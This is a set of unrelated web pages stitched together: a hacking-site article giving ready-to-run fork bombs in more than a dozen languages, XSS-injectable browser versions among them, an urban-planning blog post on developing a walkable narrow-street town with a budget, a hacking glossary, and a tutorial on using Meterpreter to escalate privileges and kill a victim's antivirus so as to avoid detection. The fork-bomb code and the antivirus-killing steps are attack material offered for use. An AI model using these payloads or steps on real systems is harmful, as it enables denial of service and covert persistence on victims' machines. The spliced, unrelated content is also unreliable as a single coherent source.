We hope that HACKAGON matched our readers expectations regarding Virology – Understanding Computer Viruses. so, if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


Think about, just 5 characters long virus equivalent of a Denial-Of-Service attack on any computer system. Which aims at depriving the system off its RAM, leaving none for vital functions required to keep the systems running, hence crashing it. Fork Bomb is not just deadly to a computer but it’s also annoying.

fork bomb

What Is Fork Bomb ??

Fork Bomb (aka Rabbit Virus or Wabbit) is a Denial-Of-Service attack wherein a process continually replicates itself to deplete available system resources, slowing down or crashing the system due to resource starvation.

How About Virus Doubling Itself !!

Virus doubling itself is a form of exponential growth.

  1. After a single iteration of the loop, two viruses are created.
  2. After another cycle, each of those two creates another two for a total of four same virus.
  3. After 10 iterations we’ll have 2^10 = 1024 virus.
  4. After 100 iterations we have 2^100 = 1.267 Nonillion, that’s a number so big you don’t even know what ‘Nonillion’ is (It’s 10^30).

Even with today’s CPUs and RAMs, being in the Tera Range (THz and Tb), the virus will probably not even complete 50 iterations before running out of memory. Remember, every iteration would hardly take a few milliseconds, so running this virus will almost definitely crash your computer.

Concept Behind Fork Bomb

Creation of a function that calls itself twice every call and doesn’t have any way to terminate itself. It will keep doubling up until you run out of system resources.

Coding Fork Bomb In Different Programming Languages

1# Fork Bomb using the Bash shell:

:(){ :|:& };:

Where,
:() means you are defining a function called :
{:|: &} means run the function : and send its output to the : function again and run that in the background.
The ; is a command separator, like &&.
: runs the function the first time.

2# Encoding in a standalone shell script as opposed to a shell function:

#!/bin/bash

./$0|./$0& #”$0″ returns the name of the shell script itself

3# Fork Bomb using the Microsoft Windows batch language:

:s
start “” %0
goto s

The same as above, but shorter:
%0|%0

4# Fork Bomb using inline shell of Perl interpreter:

perl -e “fork while fork” &

5# Fork Bomb Using Python:

import os
while 1:
os.fork()

6# Fork Bomb Using Ruby:

loop { fork { load(__FILE__) } }

7# Fork Bomb using Haskell:

import Control.Monad (forever)
import System.Posix.Process (forkProcess)

forkBomb = forever $ forkProcess forkBomb

main = forkBomb

8# Fork Bomb using Common Lisp (Clozure CL):

(loop (#_fork))

9# Fork Bomb using C:

#include <unistd.h>

int main(void)
{
while(1) fork();
}

10# Fork Bomb using Assembly:

section .text
global_start

_start:
mov eax,2 ;System call for forking
int 0x80 ;Call kernel
jmp _start

Fork Bomb In .NET using C#:
static void Main()
{
while (true) Process.Start(Assembly.GetExecutingAssembly().Location);
}

11# Fork Bomb using VB.net:

Do
System.Diagnostics.Process.Start(System.Reflection.Assembly.GetExecutingAssembly().Location)
Loop While True

12# Fork Bomb using JavaScript code that can be injected into a Web page via an XSS vulnerability exploit, resulting in a series of infinitely forking pop-up windows:

<script>
while (true) {
var w = window.open();
w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}
</script>

Or, an easier-to-inject, harder-to-censor version of the above that uses an event spoofing attack:

<a href=”#” onload=”function() { while (true) { var w = window.open(); w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML); } }”>XSS fork bomb</a>

Or, a more aggressive version:

<script>
setInterval(function() {
var w = window.open();
w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}, 10);
</script>

Prevention

As a Fork Bomb’s mode of operation is entirely encapsulated by creating new processes, one way of preventing a fork bomb from severely affecting the entire system is to limit the maximum number of processes that a single user may own.

  • On Linux, this can be achieved by using the ulimit utility; for example, the command ulimit –u 30 would limit the affected user to a maximum of thirty owned processes.
  • On PAM (Pluggable Authentication Module) enabled systems, this limit can also be set in /etc/security/limits.conf
  • On FreeBSD, the system administrator can put limits in /etc/login.conf.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

We hope that HACKAGON provided knowledge about an amazing virus. so, if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.

Let’s Build a Traditional City and Make a Profit

Let’s Build a Traditional City and Make a Profit: A better way would be to start from scratch. This means purchasing some land – and we have two options;

  1. Found our own town completely from scratch.
  2. Infill an existing town or city with traditional human-scale development.

Founding our own town is tempting – rural land is cheap, and we have the ability to build whatever we want. However, it has its downfalls – no one currently lives there, and unless you’ve somehow managed to convince 1,000 families to relocate with you without any guarantee of a job when they get there, you will have a hard time populating your town. Let’s also add to the fact we could be building on potentially valuable agricultural land or interfering with some other natural habitat.

We can still build a traditional urban environment from scratch, even without founding our own city. Look around your city – I am sure you will be able to find plenty of suitable locations. For example, take a look at this satellite image of Houston;

 

 

I have outlined all of the potential infill locations in red. As you can see, there is no shortage of land in most of our city’s today.

Infill development has many advantages;

  1. You’re not contributing to urban sprawl.
  2. You can utilize the city’s existing infrastructure like fire and police protection, there are already water, electric, and telecommunication utilities, garbage collection, mail services, and perhaps even transit – without having to worry about all of that yourself.
  3. You already have an existing population base around you. It’ll be much easier to attract residents and shoppers that already live in the city.

WHAT’S WRONG WITH NEW URBANISM?

Most developers looking for a profit and urban planners wanting something ‘better’ than suburbia tend to build New Urbanism;

 

 

 

 

‘New’ Urbanism isn’t exactly new. New Urbanism is a marketing name for 19th-century and early 20th-century Americana. There really isn’t that much difference between a 21st century New Urbanist neighbourhood;

 

 

And this turn-of-the-20th-century neighbourhood;

 

 

The only difference is that the houses are newer and bigger now.

Yes, it is better than your conventional suburban sprawl;

 

 

But only slightly so. New Urbanism is just a realization that what we’re doing now is stupid, and since we don’t know of anything better, let’s build what we use to build before – even if that was also stupid.

New Urbanism started when we saw old photos of this;

 

 

And thought that it looked significantly better than this monstrosity;

 

 

So we tried to rebuild it;

 

 

And we failed.

Why doesn’t it work? Because these were the sorts of places that we flew to the suburbs from;

 

 

The automobile just made it possible. Making the buildings shiny and new isn’t going to change anything this time round.

When I look at this I get depressed;

 

 

Yes, the buildings are nice and shiny, but where are the people? All I see are cars. It is not a very human-centric environment, nor very inviting. I would not pay money to travel there or move there without a good reason to.

Previously, I discussed that if you want to get people walking, you need to build human-scale environments. New Urbanism;

 

 

Is just a recreation of the 19th century hypertrophic city, complete with wide roads. When we paved the middle and segregated pedestrians from motorized traffic, it became obvious that we had built an auto-centric environment dominated by machines that felt inhuman to experience first hand;

 

 

So to compensate for the harsh inhuman brutalist imposing environment we built, we had to flee to our leafy suburban outskirts to feel in touch with nature just so we felt human again;

 

 

Building more suburbia is not the answer, nor is returning to the environment that we fled from. We need to build a human-scale, human-centric environment that is warm and inviting, not an automobile-centric one.

The proof that New Urbanism is an automobile-centric environment is in the pudding. Take a look at this New Urbanist neighbourhood;

 

 

Where are the people? All I see are cars. This is not progress. Add a few more decades and we will flee from it again.

We have to get out of the ugly habit of building such automobile-friendly environments. Once we make it automobile-friendly by adding wide roads and segregating automobile and pedestrian traffic, the automobile will take over. Remember, we fled from this. The result just happened to be worse, because we did not know any better.

When we break the habit of building wide roads and segregating automobiles from pedestrians – even without having to ban them – we will begin building pleasant urban environments.

Let’s think ‘human-scale’;

 

 

 

 

 

The other side of the street should not feel like it is a world away – it should not be divided by a dangerous highway of heavy machinary;

 

 

It should feel human-centric – safe, warm, inviting;

 

 

We should feel safe walking anywhere on the street;

 

 

The street should not feel divided into a ‘left’ and ‘right’ side. We should feel like we are on the entire street;

 

 

The secret to building these great warm homely-feeling places is so simple. The secret is to build narrow streets! That is all we have to do.

We do not have to ban cars, nor do we have to start out with fantastic public transportation – all we have to do is build narrow streets like this;

 

 

Instead of this;

 

 

And we are naturally going to walk. We don’t have to spend more money – we don’t have to change the architecture. None of that matters. All we need to do is build narrow streets;

 

 

In a human-scale environment like this, we can save a lot of money.

At a government level; we do not need to pay for the upkeep of such wide roads.

At a business level; if the majority of our customers choose to walk, we also do not need to provide massive parking lots.

At an individual level; if we live there and can do most of our daily needs on foot, we do not need to own a car (or a second car).

That means everyone has more money to enjoy on everything else in life.

Every day, people are spending tens of thousands of dollars to escape this;

 

 

And jump on a 12 hour flight to spend a few weeks with their family in this;

 

 

 

 

 

 

What do all of these places have in common? Very narrow streets. That is the traditional way that we have been building cities for millenia. It is our natural habitat. It feels very inviting and human-scale. It is not expensive and does not require any specialized skills. Just build it, and you will attract a lot demand.

It is not about trying to achieve density by building up. You will just spend more money building skyscrapers, and it does not solve the problem of it feeling like a soulless auto-centric environment once you step outside;

 

 

Anyone who thinks New Urbanism is the pinnacle of urban design is wrong. Just build narrow streets and ignore the New Urbanists and their wide-road fetish.

TAKING AN OLD AIRPORT

Let’s use the example of Cantrell Field Airport in Conway, Arkansas. The city is relocating their airport and selling off the existing airport’s land. I got this map from the city’s website (click here for the PDF);

 

 

The red area represents the 151 acre site that they are trying to sell as a single piece of property. The asking price is around $9 million. If I could afford to buy it (investors and venture capitalists – where are you!) I would purchase it. It’s a little over 1 mile out of downtown Conway;

 

 

OUR REQUIREMENTS

So let’s imagine for a minute that we own this land and we want to build a traditional human-scale urban environment there;

 

 

Before we can begin to draw up a plan, we will have to work out a few requirements;

  1. We should waste as little land as possible by trying to achieve a high Place:Non-Place ratio.
  2. There needs to be a variety of wide and narrow roads, and open-spaces in the form of parks and plazas.
  3. The environment should be clearly designed for people – not automobiles, not bicycles, and not transit. It needs to accomidate automobiles, bicycles, and transit – but they should be secondary.
  4. Since we are interfacing with a car-dependent suburban environment, we need to accomidate for parking so people can enter and leave our human-scale environment, but we need to keep as much of this infrastructure out of view as possible to not destroy the sense of being in a human-oriented environment.
  5. We are playing the role of a private developer, so we need to get a positive return on our investment.

So let’s summarize what we want the end result to look like;

 

 

 

 

 

If that’s not your style, let’s try something a little more single story;

 

 

If you don’t like that architecture, we could make it feel a little more Japanese;

 

 

Personally, I like something with a little charm;

 

 

 

But maybe you like modern, clean, high-rises?

 

 

To be honest, the architectural style doesn’t matter. Infact, we’re not even going to specify it – just let people build in whatever style they want and let a local style emerge naturally.

However, we want to avoid this at all costs;

 

 

Yuck. The building’s architecture is great – there’s nothing I could criticize about it. But look at the overall environment. It’s very car dominated and human-unfriendly.

 

 

The sad thing is, it looks like the architect actually tried to make something nice here.

IMAGINING THE POSSIBILITIES

Now that we have our requirements, and our 151 acre site, how much can we fit into it?

 

 

We could take the easy option out and fill it in with more suburban sprawl;

 

 

But what are we accomplishing besides contributing to suburban sprawl? Nothing.

We could try to build a Portland;

 

 

151 acres is starting to look like a significant amount of land. But even Portland;

 

 

While better than suburban sprawl, still isn’t the human-scale environment complete with narrow streets that we are trying to build;

 

 

Let’s try building a Barcelona instead;

 

 

Now 151 acres is looking like it is large enough to fit its own city in there, with a mixture of wide and narrow streets.

Do you see that large green road that’s running down the middle? This is what it would look like;

 

 

While the majority of the streets would feel more like;

 

 

Do you notice the lack of cars?

 

 

We are certainly not banning them from our environment (this would be problematic for emergency services and shops expecting deliveries) – but because our environment is very human-scale, most people would perfer to walk over drive any day.

We don’t have to follow Barcelona. We could build our own Venice;

 

 

Don’t like the European theme? Then let’s built a Kyoto;

 

 

What do Barcelona, Venice, and Koyoto have in common? They are all human-scale environments. They all have a nice mixture of wide and narrow streets. What else do they have in common? Many people spend their entire life savings just to spend a few weeks there.

Now that you know what is possible, we are going to attempt to build an environment that will pull in the tourists, be a hub for cultural flourishment, an incubator for small businesses, and have a fit populous that rely on their own two feet instead of their cars, save a lot in infrastructure costs, dramatically increase land values, and ultimately – make a profit.

Does it sound too good to be true? Then let’s do it.

DRAWING UP A PLAN

We are now at a stage where we need to draw up a plan. Let’s define the major arterial streets;

 

 

These are your standard wide American style Complete Streets, with traffic lights, sidewalks, and possibly even bike lanes;

 

 

They are expensive to build, so we have to limit ourselves to placing them in just a few major arterial corridors.

Now, it’s time to insert our narrow streets. Ideally these will be between 11 to 15 feet wide, building front to building front;

 

 

Before we can draw our narrow streets, we will have to determine our block sizes. We want a mixture of block sizes so that we get a variety of architectural styles. On average, we will aim for 200 foot wide blocks – but we will not stick strickly to this – we want to allow some to be bigger and some to be smaller, and try to avoid exact 90 degree angles;

 

 

This may look very alien and chaotic if you are use to seeing maps with perfectly square uniform streets;

 

 

But we are not aiming for a sterile square grid, instead we are trying to imitate the organic nature of traditional cities;

 

 

What do those narrow streets look like from ground level?

 

 

Notice that we are not going to ban cars, but by building an environment at a human-scale, we are going to discourage driving as much as possible.

See the lack of surface area on those narrow streets? It’s much cheaper to maintain than this;

 

 

It’s also more aesthetically pleasing.

Open space is still important, so we will reserve a nice 250 x 160 foot park in the middle;

 

 

Our park may look something like this;

 

 

Is not this form of open space much more pleasant than the busy road?

A park by itself will not do. We also want to encourage a sense of community and culture by giving the people an outdoor space to play in and host farmers markets, concerts, and other cultural events in too. To achieve this goal we will build several outdoor plazas;

 

 

Three large plazas will provide ample room for outdoor entertainment;

 

 

They are not complex or expensive to build, just pave the block;

 

 

Or get as intricate as you want;

 

 

But avoid the easy temptation to open your plaza up for parking. Otherwise it will turn into this;

 

 

Yuck. We are trying to build a place for humans, not cars. Once we let cars overtake an environment built for humans, we have lost. Our plazas are community spaces. We should be able to have lunch with friends there;

 

 

Watch a concert there;

 

 

See a street performer perform a magic trick in front of a crowd there;

 

 

Not park our car there;

 

 

A parking lot is not a community space. It is soleless infrastructure that caters for one thing only – your automobile – and should be hidden from view. It does not add any sort of destination or aesthetics to the environment.

Our final step is to fill in the rest of the land, and sell it off;

 

 

ACCOMMODATING PARKING

Because we are surrounded by a heavily car-dependent suburban environment, we need to interface with it and accomidate for parking. Our blocks that average 200 x 200 feet provide ample room for parking. However, our single restriction is that our parking should not waste precious street frontage.

Never allow this;

 

 

It’s unsightly, it’s unattractive – it wastes precious street frontage. It has instantly killed any walkability, and makes our environment look very automobile-oriented – and that is exactly what we are trying to avoid.

In a human-scale environment which encourages walking, there is no need to accomidate for so many cars. We need to accomidate for those commuting in and out of the surrounding suburbia, but the environment encourages them to do as much as possible on foot once they are already here. There is no need for every shop to have enough parking spots for the Black Friday sales rush.

A cheap way to easily add surface parking is to do a European perimeter block style approach;

 

 

By building around the outside of the block, we can use the middle for rear parking;

 

 

It keeps the environment fully walkable and human scale from the street;

 

 

Except for the occasional opening, you would never know that there was a parking lot behind those buildings! From a cross section of the block, this would look like:

 

 

And it’s no more expensive to build than this monstrosity;

 

 

The primary difference is that we have rearranged the layout so the parking lot is behind the building.

What if that still isn’t enough parking? Then you can simply cover the first parking lot;

 

 

With a ramp up to the roof;

 

 

And still from the street, you will not see a thing;

 

 

A cross-section of this building would look like;

 

 

How about a large department store that needs a lot of parking?

 

 

Now we are starting to get a little expensive, but if you desperately need that much parking and you are willing to pay for it, it is entirely possible;

 

 

Remember, we are not in the suburbs anymore. You can easily have tens of thousands of customers living within walking distance of you – so you don’t need to accomidate the storage room for a car for each one of them. This makes building in a traditional city much cheaper than you think.

If you are a hotel that wants to use the upper floors for rooms instead, nothing stops you from placing your parking underground;

 

 

Perhaps we want something other than parking? Perhaps we are developing a mixed use retail/apartment complex, and part of the selling point of our apartments is a safe, semi-private outdoor space?

 

 

You now have something like this;

 

 

Or even this;

 

 

With a little creative use of how we use our land, it is not very difficult to come up with solutions for offering parking and even private backyards, without having to sacrifice street frontage, walkability, or having to transform the human-scale environment into an automobile-scale environment. In most cases, it is not very expensive either – just build as we build now, but put the parking lot behind the building. It only becomes expensive if you try to build a lot of parking – but hopefully the walkable nature of the environment eliminates the need for excessive parking in many cases.

Budgeting

We want to make a profit on our investment, so we will have to budget how much this will cost to build and maintain. Let’s look at our plan again;

 

 

We will first calculate our construction costs. I measured 10,373 feet or nearly 1.97 miles of wide arterial streets, and 42,200 feet or nearly 8 miles of narrower streets. That’s a total of 52,573 feet of street we will have to build. (When taking these measurements I rounded up as I prefer to err on the upper-side of my cost estimations.)

Our artertial roads will be your typical wide Complete Streets;

 

 

Starting from one side, there will be 10 feet for the sidewalk, 10 feet for parallel parking, 6 feet for cyclists, and another 10 for traffic, then reverse it on the other side for a total of 72 feet – building front to building front. That’s extremely wide! That is also why we are only building so few streets like this (just as the boulevards of Paris only make up a tiny fraction of the streets there.) Wide streets are a non-place, but a tolerable one – so long as we keep their usage to a bare minimum.

The rest of our streets will have a much more human-scale 11 to 15 foot width;

 

 

So let’s work out how much land will be used by our streets, our park, our plazas, and ultimately, calculate much land is actually available to develop on.

Arterial Streets (Purple) 746,856 square feet
Narrow Streets (Black) 788,595 square feet
Parks (Green) 38,934 square feet
Plazas (Grey) 57,245 square feet
Available Land 4,945,930 square feet
Total 6,577,560 square feet
(151 acres)

We have an astonishing 4,946,930 square feet of land that we can develop on! We are not actually going to build any of the buildings ourselves, but rather sell that land off and let property developers do the building themselves.

But before we go selling this land off to developers, we need to work out what our construction and maintenance costs will be.

We will use plain brick to pave our narrow streets and plazas. It’s simple, aesthetically pleasing, and we can add any other ornimation (such as benches and fountains) later;

 

 

We also have to think about connecting underground utilities, maintaining our parks, and other associated costs. Our plazas also require maintenance, but we can cover those costs by placing them in the hands of a trust responsible for renting them out to make them financially self sufficient.

Our estimated budget works out to be;

Initial Cost Per Year
Purchasing the land $9,000,000
Arterial roads – About $5 million per mile – with a 15 year life span. $9,822,900 $654,860
Narrow streets – About $3 per square foot – with a 50 year life span. $2,365,785 $47,316
Plazas – Also $3 per square foot. $171,735 $3,435 – Handled by a trust responsible for renting out the plazas for community events.
Parks – Construction costs are about $6.75 per square foot, yearly maintence costs are about $1.40 per square foot. $262,804 $54,508
Electrical and Telecommunication Cabling – About $40 per foot for 52,573 feet of street. $2,102,920 Handled by the property owners and the utility company.
Sewage and Water Pipelines – About $60 per foot – doubled to $120 per foot for both water and sewage. $6,308,760 Handled by the property owners and the utility company.
Total $30,034,904 $756,684

$30 million is a significant investment. Still, that is about the cost of building a subdivision anyway – so the price tag should be nothing too shocking to an investor.

I would also like to point out something interesting – notice how much more it is to construct and maintain the arterial ‘Complete Streets’ compared to our narrow brick streets – and those more expensive Complete Streets have a much shorter life span too!

Construction Cost per foot Maintaince Cost averaged per year
Our 72 foot wide arterial ‘Complete Streets’ $947 $63
Our 15 foot wide brick street $15 $1.12

And you wonder why our cities are going bankrupt!

When you start bringing things down to a human-scale, our budgets also shrink down to a human scale. What would have cost millions to pave;

 

 

Now only costs thousands;

 

 

Anyway, back to our plan. We need to raise at least $30,034,904 to cover our initial construction costs, and at least $756,684 per year to cover maintenance costs. The only way we are going to make money initially is by selling off plots of land. We have 4,945,930 square feet of available land, so it’s simple math;

$30,034,904 / 4,945,930 square feet = $6.07 per square foot

We have to sell off plots of land for at least $6.07 per square foot to break even. Land around Conway sells for anything around $1 per square foot in low density industrial areas, up to $15 per square foot in desirable retail locations. One particular abandoned fast food restaurant location is selling for $10 per square foot – which seems to be about the average price in the area.

Since we are property developers, we want to get a decent return on our investment to make it worth our while. I think it’s fully reasonable to sell plots off at $8 per square foot to attract interest, and we can still get a decent profit from it. At $8 per square foot, a developer can purchase an entire 200 x 200 foot block for around $320,000.

We also have to consider our $756,684 per year maintenance costs to keep our streets and our park in top condition. In many cases, when someone purchases into a subdivision, they are often charged a maintenance fee to cover landscaping and street maintenance. We can do the same, by dividing the maintenance fee among property owners based on how much street frontage they have access to.

We have 52,573 feet of streets. Considering that we will build against both sides of the street, that gives us a total of 105,146 feet of street frontage. Our park and our plazas take up 1640 feet, so that leaves us with 103,506 feet of taxable street frontage. By using simple math again, we can calculate our maintenance costs to charge per foot of street frontage;

$756,684 per year / 103,506 feet = $7.32 per foot per year

We will need to charge $7.32 per foot to break even – but as profit-hungry investors, we want to make some income off of it, so we will bump this up to $9 per foot. If you owned a 200 x 200 foot block, you will find yourself with a $7,200 per year fee. However, a 15 foot wide shop;

 

 

Would only pay $135 per year in street frontage tax. That’s not very expensive at all, and tries to discourage a single business from taking up an entire block just for the sake of it.

It’s now time to budget it out, and calculate our profit;

Once off Per Year
Land sales $39,567,440
Construction -$30,034,904
Street Frontage Tax $931,554
Maintenance -$756,684
Profit $9,532,536 $174,870

More importantly, what will the return on our investment be? We will calculate the return on investment as;

(Profit / Cost) * 100% = Return on Investment

Just by selling off all of our available land, we can calculate our initial return on investment.

$9,532,536 / $30,034,904 = 32%

A 32% return on investment is very good compared to other real estate investments. As a long term investment, our ROI increases over time;

 

 

In 15 years, our ROI grows to 40%, and after 32 years it passes the 50% mark. All of the numbers I used to calculate this are above – so if you don’t believe me, you can do the math yourself!

If this development was undertaken by a city rather than a private developer, your ROI will be potentially higher because you will also be collecting property and sales taxes.

This is much better than your typical suburban sprawl;

 

 

With your $5 million per mile ‘Complete Streets’;

 

 

No wonder most cities can barely keep themselves financially solvent.

CONCLUSION

In my last blog post I discussed ways of transforming an existing environment to make it much more walkable and human-scale, but this time we have built an environment completely from scratch. It does not have to be expensive – what I presented was a comprehensive multi-million dollar 151 acre undertaking – but you can start much smaller. Just look at all of the infill development possibilities around you! I also showed the financial benefits of using extremely narrow streets – they are much cheaper to construct, maintain, and they also last a lot longer.

In the end, I have shown you how to create an environment similar to one where many people will sacrifice their entire life savings just to spend a few weeks in or dream moving to;

 

 

 

 

We can build this right here;

 

 

 

 

Instead, we just end up spend many millions of dollars building more of this crap;

 

 

 

It frustrates me how many people just don’t seem to get it.


Humans should be defined by Laziness before Intelligence. So save your google-ing time with below-listed Terms Of Hacking World which will make you a cool HACKER.

Terms Of Hacking World

Terms Of Hacking World:

1# DDoS: DDoS (Distributed Denial of Service) is a type of DOS attack where multiple compromised systems, which are often infected with a Trojan, are used to target a single system causing a Denial of Service (DoS) attack.

2# VPS: A virtual private server (VPS) is a virtual machine sold as a service by an Internet hosting service. A VPS runs its own copy of an operating system, and customers have superuser-level access to that operating system instance, so they can install almost any software that runs on that OS.

3# SE: Social engineering is an attack vector that relies heavily on human interaction and often involves tricking people into breaking normal security procedures.

4# HTTP: The Hypertext Transfer Protocol (HTTP) is an application protocol for distributed, collaborative, hypermedia information systems. HTTP is the foundation of data communication for the World Wide Web. Hypertext is structured text that uses logical links (hyperlinks) between nodes containing text.

5# SSH: Secure Shell, or SSH, is a cryptographic (encrypted) network protocol operating at layer 7 of the OSI Model to allow remote login and other network services to operate securely over an unsecured network or in simple words Secure Shell, used to connect with Virtual Private Servers.

6# FTP: The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.

7# XSS (CSS): Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side script into web pages viewed by other users.

8# Script Kiddie: A Script Kiddie or Skiddie (also known as skid and script bunny, the term script kitty is not valid in this context) is an unskilled individual who uses scripts or programs developed by others to attack computer systems and networks and deface websites.

9# VPN: A Virtual Private Network (VPN) extends a private network across a public network, such as the Internet. It enables users to send and receive data across shared or public networks as if their computing devices were directly connected to the private network, and thus benefit from the functionality, security and management policies of the private network.

10# Nix: Nix is a powerful package manager for Linux and other Unix systems that make package management reliable and reproducible. It provides atomic upgrades and rollbacks, side-by-side installation of multiple versions of a package, multi-user package management and easy setup of build environments.

11# SQL: Structured Query Language is a special-purpose programming language designed for managing data held in a relational database management system (RDBMS), or for stream processing in a relational data stream management system (RDSMS).

12# FUD: Fully undetectable (usually shortened as FUD) can stand for data that had been encrypted, making it appear to be random noise. It can also stand for software that cannot be detected by anti-viruses when a scan is performed. The term is used in hacker circles to refer to something that appears to be clean to many anti-viruses, even though it is a hacking tool.

13# LOIC/HOIC: The Low/High Orbit Ion Cannon, often abbreviated to HOIC, is an open source network stress testing and denial-of-service attack application written in BASIC designed to attack as many as 256 URLs at the same time.

14# Trojan: A Trojan horse or Trojan is a type of malware that is often disguised as legitimate software. Trojans can be employed by cyber-thieves and hackers trying to gain access to users’ systems. Users are typically tricked by some form of social engineering into loading and executing Trojans on their systems.

15# Botnet: A botnet (also known as a zombie army) is a number of Internet computers that, although their owners are unaware of it, have been set up to forward transmissions (including spam or viruses) to other computers on the Internet.

16# SQL Injection: SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).

17# Root: Highest permission level on a computer which allows the user to modify anything on the system without restriction.

18# Warez: Warez is copyrighted works distributed without fees or royalties, and may be traded, in general, violation of copyright law. Warez are generally unauthorized releases by organized groups, as opposed to file sharing between friends or large groups of people with similar interest using a darknet. Warez are not usually commercial software counterfeiting.

19# White Hat Hacker: A white hat hacker is a computer security specialist who breaks into protected systems and networks to test and assess their security. White hat hackers use their skills to improve security by exposing vulnerabilities before malicious hackers (known as black hat hackers) can detect and exploit them.

20# Black Hat Hacker: A black hat hacker is an individual with extensive computer knowledge whose purpose is to breach or bypass internet security. Black hat hackers are also known as crackers or dark-side hackers. The general view is that, while hackers build things, crackers break things.

21# Grey Hat Hacker: The term “Grey Hat” refers to a computer hacker or computer security expert who may sometimes violate laws or typical ethical standards, but does not have the malicious intent typical of a black hat hacker.

22# Rootkit: A rootkit is a clandestine computer program designed to provide continued privileged access to a computer while actively hiding its presence. The term rootkit is a connection of the two words “root” and “kit”. This kind of virus can be easily removed by booting the computer in safe mode.

23# Ring0: Very hard to remove and very rare in the wild, these can require you to format, it’s very hard to remove certain ring0 rootkits without safe mode.

24# IP Grabber: A link that grabs victim’s IP when they visit it.

25# Malware: ‘Malware’ is an umbrella term used to refer to a variety of forms of hostile or intrusive software, including computer viruses, worms, trojan horses, ransomware, spyware, adware, scareware, and other malicious programs. It can take the form of executable code, scripts, active content, and other software.

26# Phreak: Phreak is a slang term coined to describe the activity of a culture of people who study, experiment with, or explore, telecommunication systems, such as equipment and systems connected to public telephone networks. The term phreak is a sensational spelling of the word freak with the ph- from the phone, and may also refer to the use of various audio frequencies to manipulate a phone system. Phreak, phreaker, or phone phreak are names used for and by individuals who participate in phreaking.

27# DOX: Doxing or doxxing, is the Internet-based practice of researching and broadcasting personally identifiable information about an individual. The methods employed to acquire this information include searching publicly available databases and social media websites (like Facebook), hacking, and social engineering. It is closely related to internet vigilantism and hacktivism. Doxing may be carried out for various reasons, including to aid law enforcement, business analysis, extortion, coercion, harassment, online shaming and vigilante justice.

28# Worm: A computer worm is a standalone malware computer program that replicates itself in order to spread to other computers. Often, it uses a computer network to spread itself, relying on security failures on the target computer to access it. Unlike a computer virus, it does not need to attach itself to an existing program.

29# Deface: A website deface is an attack on a site that changes the appearance of the site or a certain web page or technically when a hacker replaces the index file with their own one.

30# Keylogger: Keylogger is a computer program that records every keystroke made by a computer user, especially in order to gain fraudulent access to passwords and other confidential information

31# RAT: A remote administration tool (RAT) is a piece of software that allows a remote “operator” to control a system as if he has physical access to that system. While desktop sharing and remote administration have many legal uses, “RAT” software is usually associated with criminal or malicious activity

So, HACKAGON hopes that we provided a lot of cool Terms Of Hacking World so that our readers can begin their Hacking career with cool ethics. And if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


Anonymity is a very big issue for a Hacker to save his ass from the Authority/Victim. If a hacker can somehow get in a system under the antivirus’s nose it is very likely that S/he will get caught if the antivirus scans the system for malicious files and connections. Protecting oneself is more important than exploiting the victim. So Let’s learn to Disable Antivirus In Remote PC.

As Installing Antivirus Software on the computer is an excellent way to deter Hackers, Conversely, Disabling Antivirus Software is an excellent way to exploit a system without leaving any Footprint.

Disable Antivirus In Remote PC

Why To Disable Antivirus In Remote PC ??

Disabling Antivirus and Firewall in victim’s PC are the necessary tasks for any Hacker to take care of because the next time the system is scanned by the victim’s antivirus software, it’s likely to detect our listener and disable it, so we need to take preemptive action to disable it before it can disable us.

Logic Behind Disabling Antivirus

Antivirus Software’s are designed in the way that nobody can shut it down by simply closing it from the tray icon or by it’s GUI. If you have an antivirus on your computer, try to close it from the tray icon or the GUI. You’ll see that it asks you to confirm your action. Now open up task manager and try to kill the antivirus process file (something like avg.exe), you’ll find that now no questions are asked and the antivirus process is killed instantly. That’s because the admin has more control over the system than the antivirus, which is exactly what we’ll use to carry out this hack.

How To Disable Antivirus In Remote PC ??

Meterpreter is the utility which gives us complete control over the system. We can send commands to install a keylogger, jump to other computers on the network, look through all the files and directories, start and close programs at our will and tons more. Here, we’ll focus on the commands to Disable Antivirus Protection.

Steps To Disable Antivirus In Remote PC

Step 1# Getting Started: First of all, we need to escalate our privileges. Usually, when we hook up a listener (Meterpreter) on the victim’s system, the listener have the same privileges as the user. Nowadays, By default, all the latest operating system’s are giving reduced privileges to the user to make sure that the user cannot tamper with important files/folders (like system32) and to add another layer of protection from Hackers. To carry out this hack we need admin (or sysadmin) privileges.

Meterpreter listener embedded

Remember! Writing this tutorial we assumed that you’ve already embedded a Meterpreter Listener on the victim’s computer.

Step 2# Get the user ID: Before attempting to increase our privileges, let’s check to see if we’re already the admin. so that we can get straight to the Hack.

Type: meterpreter > getuid

Now this should return the ID of the user currently logged in. Depending on the OS this statement gives different results but we’re looking for are the keywords like “admin”, “sysadmin”, “authority”, “system”. These are bound to be associated with an account with admin privileges. Chances are that we’ll get something else not similar to this so, in the next step, we’ll take care of that.

Step 3# Escalate Privileges: Metasploit and its Meterpreter make it simple to escalate privileges to the sysadmin.

Type: meterpreter > getsystem

Escalate Privileges

You’ll notice that Metasploit responds with something like “…got system (with technique 1)” if everything went as planned. There are multiple inbuilt functions that Metasploit uses to try to increase privileges when ‘getsystem’ command is sent. It simply tries out all of them to see which one works.

Step 4# Check That Are we Sysadmin: Now that Metasploit has told us that it has escalated our privileges to sysadmin, let’s make sure.

Type: meterpreter > getuid

Check That Are we Sysadmin

One of the most common returns to the getuid after this command is Server username: NT Authority\System and this is what we’re looking for ideally. But if you get any of the above keywords, that’s just fine as well.

Step 5# Kill The Antivirus: Now as we have the power of admin. Let’s kill the antivirus of the victim. And For that purpose, Metasploit has a Ruby script called killav.rb which looks for any antivirus process that is running to shuts them down. It works on almost all of the antiviruses so we can be reasonably sure that it’ll do the job. (If it doesn’t, we could alternatively look for running processes and try to kill them manually).

Type: meterpreter > run killav.rb

Kill The Antivirus

You should see an output like “Killing Antivirus…”

Killing Antivirus

